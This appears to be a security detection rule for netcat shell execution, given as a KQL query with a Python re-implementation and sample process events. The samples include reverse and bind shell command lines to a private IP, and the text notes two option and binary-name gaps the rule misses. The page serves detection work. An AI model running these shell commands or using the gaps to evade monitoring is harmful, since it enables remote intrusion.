Detects execution of netcat (nc or ncat) with the "-e" or "-c" flag followed by a common shell. This combination hands the network connection to a shell and is a typical way to set up a reverse (or bind) shell.
nc / ncat Shell Execution
LOLBINs Linux Execution
{{ mitre("T1059.004")}}
Data Source(s): Command, Process
// Flags that make netcat execute a program and wire it to the socket (-e / -c).
let selection_flags = dynamic([' -c ',' -e ' ]);
// The program being a shell: bare names, absolute /bin paths, and the $IFS-separated form used to evade space-based filters.
let selection_shell = dynamic([' ash', ' bash', ' bsh', ' csh', ' ksh', ' pdksh', ' sh', ' tcsh', '/bin/ash', '/bin/bash', '/bin/bsh', '/bin/csh', '/bin/ksh', '/bin/pdksh', '/bin/sh', '/bin/tcsh', '/bin/zsh', '$IFSash', '$IFSbash', '$IFSbsh', '$IFScsh', '$IFSksh', '$IFSpdksh', '$IFSsh', '$IFStcsh', '$IFSzsh']);
// DeviceProcessEvents is the Defender for Endpoint table that carries ActionType, FolderPath and ProcessCommandLine.
DeviceProcessEvents
| where ActionType == "ProcessCreated"
| where FolderPath endswith "/ncat" or FolderPath endswith "/nc" //selection_nc
| where ProcessCommandLine has_any (selection_flags) // a -c or -e flag is present
| where ProcessCommandLine has_any (selection_shell) // and a shell is named on the command line
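To see what the four where-clauses above actually fire on, here is an added Python re-implementation of the rule run over constructed process-creation events; it is example code written for this page, not part of the rule or of any Defender schema. It assumes plain substring containment is the intended meaning of the spaced tokens in the two selection lists (KQL has_any is term-based, so edge cases may differ slightly), and the sample events are made up. Two of the non-matching samples illustrate gaps a practitioner should know about: ncat's long options (--exec, --sh-exec) are not in selection_flags, and a binary installed as netcat rather than nc or ncat is not covered by selection_nc.

```python
from dataclasses import dataclass

# The two selection lists from the query, reproduced verbatim.
SELECTION_FLAGS = [" -c ", " -e "]
SELECTION_SHELL = [
    " ash", " bash", " bsh", " csh", " ksh", " pdksh", " sh", " tcsh",
    "/bin/ash", "/bin/bash", "/bin/bsh", "/bin/csh", "/bin/ksh", "/bin/pdksh",
    "/bin/sh", "/bin/tcsh", "/bin/zsh",
    "$IFSash", "$IFSbash", "$IFSbsh", "$IFScsh", "$IFSksh", "$IFSpdksh",
    "$IFSsh", "$IFStcsh", "$IFSzsh",
]


@dataclass
class ProcessEvent:
    """Only the three DeviceProcessEvents columns the query reads."""
    ActionType: str
    FolderPath: str
    ProcessCommandLine: str


def is_netcat_binary(folder_path: str) -> bool:
    # selection_nc: image path must end in /nc or /ncat (so "netcat" is not matched)
    return folder_path.endswith("/ncat") or folder_path.endswith("/nc")


def matches_netcat_shell(ev: ProcessEvent) -> bool:
    """Python equivalent of the four where-clauses.
    Substring containment stands in for KQL has_any (assumption, see lead-in)."""
    if ev.ActionType != "ProcessCreated":
        return False
    if not is_netcat_binary(ev.FolderPath):
        return False
    cmd = ev.ProcessCommandLine
    has_flag = any(flag in cmd for flag in SELECTION_FLAGS)
    has_shell = any(shell in cmd for shell in SELECTION_SHELL)
    return has_flag and has_shell


# Constructed sample events (not real telemetry): label, event, expected verdict.
SAMPLE_EVENTS = [
    ("reverse shell, nc -e",
     ProcessEvent("ProcessCreated", "/usr/bin/nc", "nc -e /bin/sh 10.0.0.5 4444"), True),
    ("bind shell, nc -l -e",
     ProcessEvent("ProcessCreated", "/bin/nc", "nc -lvp 4444 -e /bin/bash"), True),
    ("ncat -c bash",
     ProcessEvent("ProcessCreated", "/usr/bin/ncat", "ncat 10.0.0.5 4444 -c bash"), True),
    ("benign port check",
     ProcessEvent("ProcessCreated", "/usr/bin/nc", "nc -zv 10.0.0.5 22"), False),
    ("benign listener, no program",
     ProcessEvent("ProcessCreated", "/usr/bin/nc", "nc -l -p 9000"), False),
    # Gap: ncat's long options are not in selection_flags, so this is missed.
    ("ncat --sh-exec, not covered",
     ProcessEvent("ProcessCreated", "/usr/bin/ncat", "ncat --sh-exec /bin/sh 10.0.0.5 4444"), False),
    # Gap: a binary named netcat fails selection_nc even with -e and a shell.
    ("netcat binary name, not covered",
     ProcessEvent("ProcessCreated", "/usr/bin/netcat", "netcat -e /bin/sh 10.0.0.5 4444"), False),
    # Hypothetical non-creation ActionType (constructed value) is filtered by the first clause.
    ("not a process creation",
     ProcessEvent("NotProcessCreated", "/usr/bin/nc", "nc -e /bin/sh 10.0.0.5 4444"), False),
]


def run_detection(events=SAMPLE_EVENTS):
    """Return the labels of the events the rule would surface as alerts."""
    return [label for label, ev, _ in events if matches_netcat_shell(ev)]


def self_check(events=SAMPLE_EVENTS) -> bool:
    """True when every sample event gets its expected verdict."""
    return all(matches_netcat_shell(ev) == expected for _, ev, expected in events)


if __name__ == "__main__":
    for label in run_detection():
        print("ALERT:", label)
    print("all expectations hold:", self_check())
```

The three true positives show both reverse and bind shells trigger (the rule does not look for a remote address, only for the flag plus shell). The two "not covered" samples are the ones to weigh when tuning: extending selection_flags with the long-option forms and selection_nc with a netcat image name closes them, at the cost of reviewing a few more benign hits.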
- Validate whether netcat is expected in the environment and confirm its use with the administrator team.
- Verify the account, timestamp and command line executed, and whether the activity was approved.
- Legitimate admin activities using netcat
Version 1.0 (date: 15/03/2024)